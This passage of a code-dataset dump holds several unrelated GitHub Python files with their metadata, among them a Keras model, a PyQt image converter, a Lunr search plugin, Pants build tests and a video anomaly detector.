model.add(tf.keras.layers.LSTM(RNN_units, name='lstm_1', time_major=False, return_sequences=True))\n\n model.add(tf.keras.layers.Flatten())\n first_fc_output_channels = 5\n\n dense1 = tf.keras.layers.Dense(first_fc_output_channels, activation='relu', name='dense1', kernel_regularizer=tf.keras.regularizers.l2(0.001))\n model.add(dense1)\n\n # Output layer\n dense2 = tf.keras.layers.Dense(2, activation=tf.nn.softmax, name='dense2')\n model.add(dense2)\n\n return model\n","repo_name":"coolo/kws","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31845447460","text":"from PyQt6.QtWidgets import QWidget, QLabel, QVBoxLayout, QComboBox,QApplication, QFileDialog\nfrom PyQt6.QtCore import Qt\nfrom convert import convert, acceptable\nimport time \n\n#hardcoded from pillow docs\nSUPPORTED_INPUTS = {\"jpeg\",\"jpg\",\"png\",\"heic\",\"ppm\", \"blp\",'bmp','dds','dib','eps','gif','icns','ico','im','msp','pcx','tiff', 'sgi','spider','tga','xbm'}\nSUPPORTED_OUTPUTS = sorted([\"JPG\",\"PNG\",\"HEIC\",\"PDF\",\"TIFF\",\"PPM\"])\n\nclass StatusLabel(QLabel):\n def __init__(self):\n super().__init__()\n self.setAlignment(Qt.AlignmentFlag.AlignCenter)\n self.setText(\"\\n\\nAccepting Images\\n\\n\")\n self.setMaximumHeight(100)\n\n#Putting these in global so all widgets have access to them\n#whacky hacks but work\nstatus = StatusLabel()\ntarget = SUPPORTED_OUTPUTS[0]\n\nclass Window(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Image Converter\")\n self.setGeometry(500,200,600,400)\n self.setAcceptDrops(True)\n self.imgLabel = ImageLabel()\n self.status = status\n self.dropdown = self.create_comboBox()\n mainLayout = QVBoxLayout()\n mainLayout.addWidget(self.dropdown)\n mainLayout.addWidget(self.imgLabel)\n mainLayout.addWidget(self.status)\n self.setLayout(mainLayout)\n\n \n def change_target(self, text):\n global target\n target = text\n \n def create_comboBox(self):\n combobox = QComboBox()\n combobox.setMaximumWidth(200)\n combobox.addItems(SUPPORTED_OUTPUTS)\n combobox.currentTextChanged.connect(self.change_target)\n return combobox\n\n \n def dragEnterEvent(self, event):\n event.accept()\n urls = event.mimeData().urls()\n urls = [url.toLocalFile() for url in urls]\n if acceptable(urls,SUPPORTED_INPUTS):\n self.status.setText(\"Images detected, release to start\")\n else:\n self.status.setText(\"File formats not supported\")\n \n def dragLeaveEvent(self,event):\n event.accept()\n self.status.setText(\"\\n\\nAccepting Images\\n\\n\")\n \n def dropEvent(self, event):\n global target\n event.accept()\n urls = event.mimeData().urls()\n urls = [url.toLocalFile() for url in urls]\n if acceptable(urls, SUPPORTED_INPUTS):\n event.setDropAction(Qt.DropAction.CopyAction)\n self.status.setText(\"Image accepted, processing\")\n self.status.repaint()\n QApplication.processEvents()\n for url in urls:\n convert(url,target)\n self.status.setText(\"\\n\\nAccepting Images\\n\\n\")\n\n\n\n\nclass ImageLabel(QLabel):\n def __init__(self) -> None:\n super().__init__()\n self.setAlignment(Qt.AlignmentFlag.AlignCenter)\n self.setText(\"\\n\\nDrop Image here\\n\\n\")\n self.setStyleSheet('''\n QLabel{\n border: 4px dashed #aaa\n }\n ''')\n \n \n def mousePressEvent(self, event) -> None:\n event.accept()\n \n def mouseReleaseEvent(self, event) -> None:\n global target\n event.accept()\n urls = QFileDialog.getOpenFileUrls(self,\"open files\")[0]\n urls = [url.toLocalFile() for url in urls]\n if acceptable(urls,SUPPORTED_INPUTS):\n for url in urls:\n status.setText(\"Image accepted, processing\")\n status.repaint()\n QApplication.processEvents()\n convert(url,target)\n else:\n status.setText(\"File formats not supported\")\n status.repaint()\n QApplication.processEvents()\n time.sleep(2)\n status.setText(\"\\n\\nAccepting Images\\n\\n\")\n \n","repo_name":"jyan1999/Image-converter","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"10807971585","text":"from catalog_system.constants import Roles, AllowedActions\n\n\nUSER_PERMISSIONS = {\n \"catalog_system.UserView\": {\n Roles.ALL_ROLES: {\"actions\": [AllowedActions.ME]},\n Roles.ADMIN: {\n \"actions\": [\n AllowedActions.RETRIEVE,\n AllowedActions.LIST,\n AllowedActions.CREATE,\n AllowedActions.UPDATE,\n AllowedActions.PARTIAL_UPDATE,\n AllowedActions.DESTROY,\n ]\n },\n },\n}\n","repo_name":"JorgeANino/ZeBrands-Public","sub_path":"app/catalog_system/user/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33100991576","text":"from Framework.ADUN import Director, Node\nfrom Object.basetower import BaseTower\nfrom pico2d import *\nimport random\n\n\nclass CannonTower(BaseTower):\n bullet = \"bullet_b\"\n damage = 10\n\n def __init__(self, x, y):\n BaseTower.__init__(self, \"cannon\", 10)\n self.money = 30\n\n self.x = x\n self.y = y\n\n def update(self):\n BaseTower.update(self)\n\n\n\n","repo_name":"adunStudio/SLIME_BREAK","sub_path":"GAME/Object/cannontower.py","file_name":"cannontower.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72654305067","text":"import numpy as np\nimport torch\nimport unittest\nfrom parameterized import parameterized\n\nfrom bridger import policies\n\n\ndef _constant_estimator(state):\n return torch.tensor([1, 0, 0, 0, 0])\n\n\ndef _state_is_action_estimator(state):\n q_values = torch.zeros(5)\n q_values[state % 5] = 1\n return q_values\n\n\ndef _noisy_state_is_action_estimator(state):\n q_values = torch.rand(5)\n q_values[state % 5] = 1\n return q_values\n\n\nclass TestProbabilities(unittest.TestCase):\n @parameterized.expand(\n [\n (_constant_estimator, state, epsilon, 0)\n for state in range(5)\n for epsilon in np.linspace(0, 1, 10)\n ]\n + [\n (estimator, state, epsilon, state % 5)\n for estimator in [\n _state_is_action_estimator,\n _noisy_state_is_action_estimator,\n ]\n for state in range(10)\n for epsilon in np.linspace(0, 1, 10)\n ]\n )\n def test_eps_greedy_policy(self, estimator, state, epsilon, mode_action):\n policy = policies.EpsilonGreedyPolicy(estimator, epsilon=epsilon)\n probs = policy.get_probabilities(state).numpy()\n self.assertAlmostEqual(probs[mode_action - 1], epsilon / len(probs))\n if epsilon != 1:\n self.assertEqual(len(set(probs)), 2)\n self.assertEqual(probs.argmax(), mode_action)\n self.assertAlmostEqual(probs.sum(), 1, places=6)\n\n @parameterized.expand(\n [(_constant_estimator, state, 0) for state in range(5)]\n + [\n (estimator, state, state % 5)\n for estimator in [\n _state_is_action_estimator,\n _noisy_state_is_action_estimator,\n ]\n for state in range(10)\n ]\n )\n def test_greedy_policy(self, estimator, state, mode_action):\n policy = policies.GreedyPolicy(estimator)\n probs = policy.get_probabilities(state).numpy()\n expected = np.zeros(probs.shape)\n expected[mode_action] = 1\n self.assertTrue(np.allclose(probs, expected))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"ldoshi/rome-wasnt-built-in-a-day","sub_path":"bridger/policies_test.py","file_name":"policies_test.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15384882916","text":"import streamlit as st\nimport requests\n\nst.title('welcome to the app!')\n\nst.header('enter the text to find the part of text responsible for the sentiment of text')\n\ntweet=st.text_input('enter the text')\nsentiment_maps={0:'neutral',1:'positive',2:'negative'}\nif tweet:\n with st.spinner('prediction is in progress'):\n tweet_data={'tweet':tweet}\n extraction_data={'tweet':tweet,'sentiment':0}\n response=requests.post('http://fastapi:8000/sentiment',json=tweet_data).json()\n extraction_data['sentiment']=sentiment_maps.get(response['sentiment'])\n extracted_pred=requests.post('http://fastapi:8000/extraction',json=extraction_data).json()\n st.success(f\"the sentiment given text lead is {extraction_data['sentiment']}\")\n st.success(f\"part of text responsible for that sentiment is {extracted_pred['extracted_text']}\")\n ","repo_name":"RavitejaBadugu/tes","sub_path":"streamlit/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39319061008","text":"\"\"\"\n hon_lunr\n ~~~~~\n\n A plugin for the Hon utility. It extends the Hon HTML output by adding\n search indexing using Lunr to the book's website.\n\n :license: MIT, see LICENSE for more details.\n\"\"\"\nimport hon\nimport json\nimport os\nimport shutil\nfrom hon.plugins import Plugin\nfrom html.parser import HTMLParser\nfrom jinja2 import (\n Environment,\n PackageLoader,\n Template,\n select_autoescape\n)\nfrom lunr import lunr\n\n\n#: The Hon-Lunr plugin's path.\nLUNR_PLUGIN_PATH = os.path.abspath(os.path.dirname(__file__))\n\n#: The default maximum number of documents that Lunr can index.\nDEFAULT_MAX_INDEX_SIZE = 1000000\n\n\ndef _on_finish_render(app, book=None, renderer=None, context=None):\n \"\"\"Function connected to rendering finished signal.\n \"\"\"\n lunr = app.get_plugin(Lunr)\n lunr.on_finish(book, renderer, context)\n\n\ndef _on_before_render(app, book=None, renderer=None, context=None):\n \"\"\"Function connected to the before render signal.\n \"\"\"\n lunr = app.get_plugin(Lunr)\n lunr.before_render(book, renderer, context)\n\n\ndef _on_generate_assets(app, book=None, renderer=None, context=None):\n \"\"\"Function connected to the asset generation signal.\n \"\"\"\n lunr = app.get_plugin(Lunr)\n lunr.generate_assets(book, renderer, context)\n\n\ndef _on_after_render_page(app, book=None, renderer=None, page=None, context=None):\n \"\"\"Function connected to the after page render signal.\n \"\"\"\n lunr = app.get_plugin(Lunr)\n lunr.after_render_page(book, renderer, page, context)\n\n\nclass PageTextParser(HTMLParser):\n \"\"\"\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(PageTextParser, self).__init__(*args, **kwargs)\n self.text = ''\n\n def handle_data(self, data):\n text = str(data).strip()\n if text:\n self.text += text\n\n\nclass Lunr(Plugin):\n \"\"\"A Hon plugin that adds Lunr search indexing.\n\n Lunr has issues with indexing more than 100k documents.\n\n :type document_store: dict\n :type search_index: object\n \"\"\"\n _name = 'Lunr'\n\n default_config = {\n 'enabled': True,\n 'max_index_size': DEFAULT_MAX_INDEX_SIZE\n }\n\n @property\n def assets_dir(self):\n \"\"\"\n \"\"\"\n path = os.path.join(LUNR_PLUGIN_PATH, 'assets')\n return path\n\n @property\n def max_index_size(self):\n \"\"\"\n \"\"\"\n return self.config.get('max_index_size', DEFAULT_MAX_INDEX_SIZE)\n\n def __init__(self, app, config=None):\n super(Lunr, self).__init__(app, config=config)\n #: The document store that will\n self.document_store = {}\n\n #:\n self.search_index = None\n\n if app:\n self.init_app(app)\n\n def add_document(self, page_url, title, summary, keywords, body):\n document = {\n 'url': page_url,\n 'title': title,\n 'summary': summary,\n 'keywords': keywords,\n 'body': body\n }\n self.document_store[page_url] = document\n return document\n\n def init_app(self, app):\n self.app.logger.debug('Initializing Lunr plugin for Hon...')\n self.environment = Environment(\n loader=PackageLoader('hon_lunr', 'templates')\n )\n\n #: Hook up the Lunr search plugin to relevant events...\n hon.after_render_page.connect(_on_after_render_page)\n hon.before_render.connect(_on_before_render)\n hon.finish_render.connect(_on_finish_render)\n hon.generate_assets.connect(_on_generate_assets)\n\n def after_render_page(self, book, renderer, page, context):\n \"\"\"\n \"\"\"\n if renderer.name != 'html' or not self.enabled or not page.search:\n return\n\n self.app.logger.debug('index page {}'.format(page.path))\n search_text = self.parse_search_text(page)\n self.add_document(page.link, page.title, page.summary,\n page.keywords, search_text)\n\n def before_render(self, book, renderer, context):\n \"\"\"\n\n :param context: The rendering context for the book.\n :type context: hon.renderers.RenderingContext\n \"\"\"\n if renderer.name != 'html' or not self.enabled:\n return\n\n print('*** context: {}'.format(context))\n context.add_plugin_resource({ 'path': 'js/lunr.js' }, 'js')\n context.add_plugin_resource({ 'path': 'js/hon-lunr.js' }, 'js')\n print('*** context: {}'.format(context))\n\n def generate_assets(self, book, renderer, context):\n if renderer.name != 'html' or not self.enabled:\n return\n\n js_output_dir = os.path.join(context.path, 'js')\n\n for asset_file in os.listdir(self.assets_dir):\n source = os.path.join(self.assets_dir, asset_file)\n if os.path.isfile(source):\n dest = os.path.join(js_output_dir, asset_file)\n shutil.copyfile(source, dest)\n\n def on_finish(self, book, renderer, context):\n if renderer.name != 'html' or not self.enabled:\n return\n\n js_output_dir = os.path.join(context.path, 'js')\n\n self.app.logger.debug('write search index')\n self.search_index = lunr(\n ref='url',\n fields=[\n dict(field_name='title', boost=10),\n dict(field_name='keywords', boost=15),\n 'body'\n ],\n documents=self.document_store.values()\n )\n serialized_index = self.search_index.serialize()\n serialized = json.dumps(serialized_index)\n\n template = self.environment.get_template('hon-lunr.js.jinja')\n output = template.render({\n 'hon_lunr': {\n 'search_index': serialized\n }\n })\n\n hon_lunr_filename = 'hon-lunr.js'\n hon_lunr_filepath = os.path.join(js_output_dir, hon_lunr_filename)\n with open(hon_lunr_filepath, 'w') as f:\n f.write(output)\n\n def parse_search_text(self, page):\n \"\"\"\n \"\"\"\n parser = PageTextParser()\n parser.feed(page.text)\n return parser.text\n","repo_name":"swquinn/hon-lunr","sub_path":"hon_lunr/lunr.py","file_name":"lunr.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6927657351","text":"n=int(input())\na=list(map(int, input().split()))\nb=sorted(a)\n\nif a==b:\n print(0)\nelse:\n for i in range(1, n):\n if a[i] < a[i-1]:\n if a[i:]==b[:n-i]:\n a[i:]==b[:n-i]\n print(len(a[i:]))\n else:\n print(-1)\n break\n\n# can alos be written as \n# for i in range(1, n):\n# if a[i] < a[i-1]:\n# print(n-i if a[i:]==b[:n-i] else -1)\n# break\n# else:\n# print(0)","repo_name":"Raffian-moin/Codeforces-solutions","sub_path":"codeforces/1200/little_pony_and_sort_by_shift.py","file_name":"little_pony_and_sort_by_shift.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35395782088","text":"#______________________________This_Game________________________\r\n#The purpose of this exercice is to get better with pygame to make games that\r\n#comes to mind.\r\n#______________________________Libraries________________________\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\n\r\npygame.init()\r\n#_______________________________Functions________________________\r\n\r\ndef colour_time(colour_list_str):\r\n while True:\r\n colour_input = input(\"What colour?\")\r\n if colour_input.upper() not in colour_list_str:\r\n print(\"Colour not in list.\")\r\n else:\r\n break\r\n return colour_input\r\n\r\ndef choose_colour(colour, colour_list_str, colour_list_int):\r\n chk = 0\r\n for colour in colour_list_str:\r\n if colour in colour_list_str:\r\n choosen_colour = colour_list_int[chk]\r\n return choosen_colour\r\n\r\ndef size_time():\r\n while True:\r\n size_input = input(\"How big do you want the screen in x and y?\")\r\n size_input_x, size_input_y = size_input.split(\",\")\r\n if size_input_x.isnumeric() and size_input_y.isnumeric == False:\r\n print(\"You input is not noumeric\")\r\n elif int(size_input_x) and int(size_input_y) >= 1000:\r\n print(\"Your input exceeds 1000\")\r\n else: \r\n break\r\n return int(size_input_x), int(size_input_y)\r\n\r\ndef name_time():\r\n while True:\r\n name_input = input(\"Name of the Game?\")\r\n if len(name_input) <= 2 or name_input[0].isalpha == False:\r\n print(\"Invalid name\")\r\n else:\r\n break\r\n return name_input\r\n\r\n#______________________________Identifiers______________________\r\nDISPLAYSURF = pygame.display.set_mode((400, 300))\r\npygame.display.set_caption(f'{name_time()}')\r\nsize_x, size_y = size_time()\r\nprint(size_x, size_y)\r\nscreen = pygame.display.set_mode((size_x, size_y))\r\n\r\nBLACK = (255, 255, 255)\r\nWHITE = (0,0,0)\r\nYELLOW = (255, 225, 0)\r\nFUCHSIA = (255, 0, 255)\r\ncolour_list_int = [BLACK, WHITE, YELLOW, FUCHSIA]\r\ncolour_list_str = [\"BLACK\", \"WHITE\", \"YELLOW\", \"FUCHSIA\"]\r\n\r\nscreen_colour = colour_time(colour_list_str)\r\nprint(screen_colour)\r\n\r\n\r\n#______________________________Logic____________________________\r\n\r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n#___________________Functions___________________\r\n\r\n\r\n\r\n#______________________________Drawing__________________________\r\n\r\n screen.fill(choose_colour(screen_colour, colour_list_str, colour_list_int))\r\n\r\n#______________________________Ending___________________________\r\n pygame.display.update()\r\n\r\n","repo_name":"BubbleTitan74/Games_n_Stuff","sub_path":"PyGame_Exercices/pg1-2-1.py","file_name":"pg1-2-1.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29116383434","text":"from __future__ import annotations\n\nimport os\nimport tarfile\nimport zipfile\nfrom io import BytesIO\nfrom textwrap import dedent\n\nfrom pants.backend.python import target_types_rules as python_target_type_rules\nfrom pants.backend.python.goals import package_pex_binary\nfrom pants.backend.python.target_types import PexBinary\nfrom pants.backend.python.util_rules import pex_from_targets\nfrom pants.core import target_types as core_target_types\nfrom pants.core.goals.package import BuiltPackage\nfrom pants.core.target_types import (\n ArchiveFieldSet,\n ArchiveTarget,\n FilesGeneratorTarget,\n FileSourceField,\n FileTarget,\n GenerateTargetsFromFiles,\n GenerateTargetsFromResources,\n RelocatedFiles,\n RelocateFilesViaCodegenRequest,\n ResourcesGeneratorTarget,\n ResourceTarget,\n)\nfrom pants.core.target_types import rules as target_type_rules\nfrom pants.core.util_rules.archive import rules as archive_rules\nfrom pants.core.util_rules.source_files import SourceFiles, SourceFilesRequest\nfrom pants.core.util_rules.source_files import rules as source_files_rules\nfrom pants.engine.addresses import Address\nfrom pants.engine.fs import EMPTY_SNAPSHOT, DigestContents, FileContent\nfrom pants.engine.target import (\n GeneratedSources,\n GeneratedTargets,\n SingleSourceField,\n SourcesField,\n Tags,\n TransitiveTargets,\n TransitiveTargetsRequest,\n)\nfrom pants.testutil.rule_runner import QueryRule, RuleRunner\n\n\ndef test_relocated_files() -> None:\n rule_runner = RuleRunner(\n rules=[\n *target_type_rules(),\n *archive_rules(),\n *source_files_rules(),\n QueryRule(GeneratedSources, [RelocateFilesViaCodegenRequest]),\n QueryRule(TransitiveTargets, [TransitiveTargetsRequest]),\n QueryRule(SourceFiles, [SourceFilesRequest]),\n ],\n target_types=[FilesGeneratorTarget, RelocatedFiles],\n )\n\n def assert_prefix_mapping(\n *,\n original: str,\n src: str,\n dest: str,\n expected: str,\n ) -> None:\n rule_runner.write_files(\n {\n original: \"\",\n \"BUILD\": dedent(\n f\"\"\"\\\n files(name=\"original\", sources=[{repr(original)}])\n\n relocated_files(\n name=\"relocated\",\n files_targets=[\":original\"],\n src={repr(src)},\n dest={repr(dest)},\n )\n \"\"\"\n ),\n }\n )\n\n tgt = rule_runner.get_target(Address(\"\", target_name=\"relocated\"))\n result = rule_runner.request(\n GeneratedSources, [RelocateFilesViaCodegenRequest(EMPTY_SNAPSHOT, tgt)]\n )\n assert result.snapshot.files == (expected,)\n\n # We also ensure that when looking at the transitive dependencies of the `relocated_files`\n # target and then getting all the code of that closure, we only end up with the relocated\n # files. If we naively marked the original files targets as a typical `Dependencies` field,\n # we would hit this issue.\n transitive_targets = rule_runner.request(\n TransitiveTargets, [TransitiveTargetsRequest([tgt.address])]\n )\n all_sources = rule_runner.request(\n SourceFiles,\n [\n SourceFilesRequest(\n (tgt.get(SourcesField) for tgt in transitive_targets.closure),\n enable_codegen=True,\n for_sources_types=(FileSourceField,),\n )\n ],\n )\n assert all_sources.snapshot.files == (expected,)\n\n # No-op.\n assert_prefix_mapping(original=\"old_prefix/f.ext\", src=\"\", dest=\"\", expected=\"old_prefix/f.ext\")\n assert_prefix_mapping(\n original=\"old_prefix/f.ext\",\n src=\"old_prefix\",\n dest=\"old_prefix\",\n expected=\"old_prefix/f.ext\",\n )\n\n # Remove prefix.\n assert_prefix_mapping(original=\"old_prefix/f.ext\", src=\"old_prefix\", dest=\"\", expected=\"f.ext\")\n assert_prefix_mapping(\n original=\"old_prefix/subdir/f.ext\", src=\"old_prefix\", dest=\"\", expected=\"subdir/f.ext\"\n )\n\n # Add prefix.\n assert_prefix_mapping(original=\"f.ext\", src=\"\", dest=\"new_prefix\", expected=\"new_prefix/f.ext\")\n assert_prefix_mapping(\n original=\"old_prefix/f.ext\",\n src=\"\",\n dest=\"new_prefix\",\n expected=\"new_prefix/old_prefix/f.ext\",\n )\n\n # Replace prefix.\n assert_prefix_mapping(\n original=\"old_prefix/f.ext\",\n src=\"old_prefix\",\n dest=\"new_prefix\",\n expected=\"new_prefix/f.ext\",\n )\n assert_prefix_mapping(\n original=\"old_prefix/f.ext\",\n src=\"old_prefix\",\n dest=\"new_prefix/subdir\",\n expected=\"new_prefix/subdir/f.ext\",\n )\n\n # Replace prefix, but preserve a common start.\n assert_prefix_mapping(\n original=\"common_prefix/foo/f.ext\",\n src=\"common_prefix/foo\",\n dest=\"common_prefix/bar\",\n expected=\"common_prefix/bar/f.ext\",\n )\n assert_prefix_mapping(\n original=\"common_prefix/subdir/f.ext\",\n src=\"common_prefix/subdir\",\n dest=\"common_prefix\",\n expected=\"common_prefix/f.ext\",\n )\n\n\ndef test_archive() -> None:\n \"\"\"Integration test for the `archive` target type.\n\n This tests some edges:\n * Using both `files` and `relocated_files`.\n * An `archive` containing another `archive`.\n \"\"\"\n\n rule_runner = RuleRunner(\n rules=[\n *target_type_rules(),\n *pex_from_targets.rules(),\n *package_pex_binary.rules(),\n *python_target_type_rules.rules(),\n QueryRule(BuiltPackage, [ArchiveFieldSet]),\n ],\n target_types=[ArchiveTarget, FilesGeneratorTarget, RelocatedFiles, PexBinary],\n )\n rule_runner.set_options([], env_inherit={\"PATH\", \"PYENV_ROOT\", \"HOME\"})\n\n rule_runner.write_files(\n {\n \"resources/d1.json\": \"{'k': 1}\",\n \"resources/d2.json\": \"{'k': 2}\",\n \"resources/BUILD\": dedent(\n \"\"\"\\\n files(name='original_files', sources=['*.json'])\n\n relocated_files(\n name='relocated_files',\n files_targets=[':original_files'],\n src=\"resources\",\n dest=\"data\",\n )\n \"\"\"\n ),\n \"project/app.py\": \"print('hello world!')\",\n \"project/BUILD\": \"pex_binary(entry_point='app.py')\",\n \"BUILD\": dedent(\n \"\"\"\\\n archive(\n name=\"archive1\",\n packages=[\"project\"],\n files=[\"resources:original_files\"],\n format=\"zip\",\n )\n\n archive(\n name=\"archive2\",\n packages=[\":archive1\"],\n files=[\"resources:relocated_files\"],\n format=\"tar\",\n output_path=\"output/archive2.tar\",\n )\n \"\"\"\n ),\n }\n )\n\n def get_archive(target_name: str) -> FileContent:\n tgt = rule_runner.get_target(Address(\"\", target_name=target_name))\n built_package = rule_runner.request(BuiltPackage, [ArchiveFieldSet.create(tgt)])\n digest_contents = rule_runner.request(DigestContents, [built_package.digest])\n assert len(digest_contents) == 1\n return digest_contents[0]\n\n def assert_archive1_is_valid(zip_bytes: bytes) -> None:\n io = BytesIO()\n io.write(zip_bytes)\n with zipfile.ZipFile(io) as zf:\n assert set(zf.namelist()) == {\n \"resources/d1.json\",\n \"resources/d2.json\",\n \"project/project.pex\",\n }\n with zf.open(\"resources/d1.json\", \"r\") as f:\n assert f.read() == b\"{'k': 1}\"\n with zf.open(\"resources/d2.json\", \"r\") as f:\n assert f.read() == b\"{'k': 2}\"\n\n archive1 = get_archive(\"archive1\")\n assert_archive1_is_valid(archive1.content)\n\n archive2 = get_archive(\"archive2\")\n assert archive2.path == \"output/archive2.tar\"\n io = BytesIO()\n io.write(archive2.content)\n io.seek(0)\n with tarfile.open(fileobj=io, mode=\"r:\") as tf:\n assert set(tf.getnames()) == {\"data/d1.json\", \"data/d2.json\", \"archive1.zip\"}\n\n def get_file(fp: str) -> bytes:\n reader = tf.extractfile(fp)\n assert reader is not None\n return reader.read()\n\n assert get_file(\"data/d1.json\") == b\"{'k': 1}\"\n assert get_file(\"data/d2.json\") == b\"{'k': 2}\"\n assert_archive1_is_valid(get_file(\"archive1.zip\"))\n\n\ndef test_generate_file_and_resource_targets() -> None:\n rule_runner = RuleRunner(\n rules=[\n core_target_types.generate_targets_from_files,\n core_target_types.generate_targets_from_resources,\n QueryRule(GeneratedTargets, [GenerateTargetsFromFiles]),\n QueryRule(GeneratedTargets, [GenerateTargetsFromResources]),\n ],\n target_types=[FilesGeneratorTarget, ResourcesGeneratorTarget],\n )\n rule_runner.write_files(\n {\n \"assets/BUILD\": dedent(\n \"\"\"\\\n files(\n name='files',\n sources=['**/*.ext'],\n overrides={'f1.ext': {'tags': ['overridden']}},\n )\n\n resources(\n name='resources',\n sources=['**/*.ext'],\n overrides={'f1.ext': {'tags': ['overridden']}},\n )\n \"\"\"\n ),\n \"assets/f1.ext\": \"\",\n \"assets/f2.ext\": \"\",\n \"assets/subdir/f.ext\": \"\",\n }\n )\n\n files_generator = rule_runner.get_target(Address(\"assets\", target_name=\"files\"))\n resources_generator = rule_runner.get_target(Address(\"assets\", target_name=\"resources\"))\n\n def gen_file_tgt(rel_fp: str, tags: list[str] | None = None) -> FileTarget:\n return FileTarget(\n {SingleSourceField.alias: rel_fp, Tags.alias: tags},\n Address(\"assets\", target_name=\"files\", relative_file_path=rel_fp),\n residence_dir=os.path.dirname(os.path.join(\"assets\", rel_fp)),\n )\n\n def gen_resource_tgt(rel_fp: str, tags: list[str] | None = None) -> ResourceTarget:\n return ResourceTarget(\n {SingleSourceField.alias: rel_fp, Tags.alias: tags},\n Address(\"assets\", target_name=\"resources\", relative_file_path=rel_fp),\n residence_dir=os.path.dirname(os.path.join(\"assets\", rel_fp)),\n )\n\n generated_files = rule_runner.request(\n GeneratedTargets, [GenerateTargetsFromFiles(files_generator)]\n )\n generated_resources = rule_runner.request(\n GeneratedTargets, [GenerateTargetsFromResources(resources_generator)]\n )\n\n assert generated_files == GeneratedTargets(\n files_generator,\n {\n gen_file_tgt(\"f1.ext\", tags=[\"overridden\"]),\n gen_file_tgt(\"f2.ext\"),\n gen_file_tgt(\"subdir/f.ext\"),\n },\n )\n assert generated_resources == GeneratedTargets(\n resources_generator,\n {\n gen_resource_tgt(\"f1.ext\", tags=[\"overridden\"]),\n gen_resource_tgt(\"f2.ext\"),\n gen_resource_tgt(\"subdir/f.ext\"),\n },\n )\n","repo_name":"akk5597/pants","sub_path":"src/python/pants/core/target_types_test.py","file_name":"target_types_test.py","file_ext":"py","file_size_in_byte":11463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"22363124992","text":"import cv2\nimport numpy as np \nfrom keras.models import load_model\nfrom PIL import Image\nimport imutils\nimport matplotlib.pyplot as plt\n\ndef mean_squared_loss(x1,x2):\n difference=x1-x2\n a,b,c,d,e=difference.shape\n n_samples=a*b*c*d*e\n sq_difference=difference**2\n Sum=sq_difference.sum()\n distance=np.sqrt(Sum)\n mean_distance=distance/n_samples\n\n return mean_distance\ndef calculate_threshold(data, factor):\n median = np.median(data)\n mad = np.median(np.abs(data - median))\n threshold = median + factor * mad\n return threshold\n\nmodel=load_model(\"saved_model.h5\")\n\ncap = cv2.VideoCapture(\"test_video3.mp4\")\nprint(cap.isOpened())\n\nloss_values = []\n\nwhile cap.isOpened():\n\n imagedump=[]\n ret,frame=cap.read()\n\n if ret == False:\n break\n\n for i in range(10):\n ret,frame=cap.read()\n if ret == False:\n break\n\n image = imutils.resize(frame,width=1000,height=1200)\n frame=cv2.resize(frame, (227,227), interpolation = cv2.INTER_AREA)\n gray=0.2989*frame[:,:,0]+0.5870*frame[:,:,1]+0.1140*frame[:,:,2]\n gray=(gray-gray.mean())/gray.std()\n gray=np.clip(gray,0,1)\n imagedump.append(gray)\n\n imagedump=np.array(imagedump)\n imagedump.resize(227,227,10)\n imagedump=np.expand_dims(imagedump,axis=0)\n imagedump=np.expand_dims(imagedump,axis=4)\n\n output=model.predict(imagedump)\n\n loss=mean_squared_loss(imagedump,output)\n\n loss_values.append(loss)\nthreshold=calculate_threshold(loss_values, 0.7)\nwhile cap.isOpened():\n\n imagedump=[]\n ret,frame=cap.read()\n\n if ret == False:\n break\n\n for i in range(10):\n ret,frame=cap.read()\n if ret == False:\n break\n\n image = imutils.resize(frame,width=1000,height=1200)\n frame=cv2.resize(frame, (227,227), interpolation = cv2.INTER_AREA)\n gray=0.2989*frame[:,:,0]+0.5870*frame[:,:,1]+0.1140*frame[:,:,2]\n gray=(gray-gray.mean())/gray.std()\n gray=np.clip(gray,0,1)\n imagedump.append(gray)\n\n imagedump=np.array(imagedump)\n imagedump.resize(227,227,10)\n imagedump=np.expand_dims(imagedump,axis=0)\n imagedump=np.expand_dims(imagedump,axis=4)\n\n output=model.predict(imagedump)\n\n loss=mean_squared_loss(imagedump,output)\n if frame is None:\n print(\"none\")\n \n if cv2.waitKey(1) & 0xFF==ord('q'):\n break\n \n if loss>threshold:\n print('Abnormal Event Detected')\n print (loss)\n cv2.putText(image,\"Abnormal Event\",(220,100),cv2.FONT_HERSHEY_SIMPLEX,2,(0,0,255),4)\n\n cv2.imshow(\"video\",image)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"Gowthamk306/AnomalyDetector_Using_STAE","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6911517348","text":"def isText(line):\n line = line.lower()\n if line.__contains__(\"a\") or 